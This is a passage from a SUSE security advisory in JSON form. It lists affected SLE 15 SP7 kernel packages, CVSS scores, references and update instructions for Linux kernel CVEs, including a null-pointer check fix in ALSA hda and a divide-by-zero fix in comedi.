"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-39913"
},
{
"cve": "CVE-2025-40097",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40097"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: hda: Fix missing pointer check in hda_component_manager_init function\n\nThe __component_match_add function may assign the \u0027matchptr\u0027 pointer\nthe value ERR_PTR(-ENOMEM), which will subsequently be dereferenced.\n\nThe call stack leading to the error looks like this:\n\nhda_component_manager_init\n|-\u003e component_match_add\n |-\u003e component_match_add_release\n |-\u003e __component_match_add ( ... ,**matchptr, ... )\n |-\u003e *matchptr = ERR_PTR(-ENOMEM); // assign\n|-\u003e component_master_add_with_match( ... match)\n |-\u003e component_match_realloc(match, match-\u003enum); // dereference\n\nAdd IS_ERR() check to prevent the crash.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40097",
"url": "https://www.suse.com/security/cve/CVE-2025-40097"
},
{
"category": "external",
"summary": "SUSE Bug 1252900 for CVE-2025-40097",
"url": "https://bugzilla.suse.com/1252900"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-40097"
},
{
"cve": "CVE-2025-40106",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40106"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: fix divide-by-zero in comedi_buf_munge()\n\nThe comedi_buf_munge() function performs a modulo operation\n`async-\u003emunge_chan %= async-\u003ecmd.chanlist_len` without first\nchecking if chanlist_len is zero. If a user program submits a command with\nchanlist_len set to zero, this causes a divide-by-zero error when the device\nprocesses data in the interrupt handler path.\n\nAdd a check for zero chanlist_len at the beginning of the\nfunction, similar to the existing checks for !map and\nCMDF_RAWDATA flag. When chanlist_len is zero, update\nmunge_count and return early, indicating the data was\nhandled without munging.\n\nThis prevents potential kernel panics from malformed user commands.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
